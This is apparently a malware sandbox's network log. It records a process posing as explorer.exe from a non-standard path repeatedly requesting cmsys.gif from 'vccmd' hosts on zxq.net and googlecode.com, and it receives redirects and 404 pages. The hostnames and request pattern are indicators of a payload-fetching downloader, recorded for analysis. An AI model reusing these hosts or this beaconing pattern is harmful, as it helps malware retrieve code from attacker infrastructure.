                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:35.331653118 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:35.511270046 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:11:35 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:41.455147028 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:41.634614944 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:11:41 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:47.344938040 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:47.526855946 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:11:47 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:52.916248083 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:53.096103907 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:11:53 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:58.507155895 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:58.686666012 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:11:58 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    20192.168.2.56049964.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:40.302423954 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:41.224806070 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:41 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:41.224822998 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    21192.168.2.560512108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:42.511394024 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:43.460814953 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:43 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:43.460885048 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    22192.168.2.560526142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:44.953408957 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:45.883838892 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:45 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
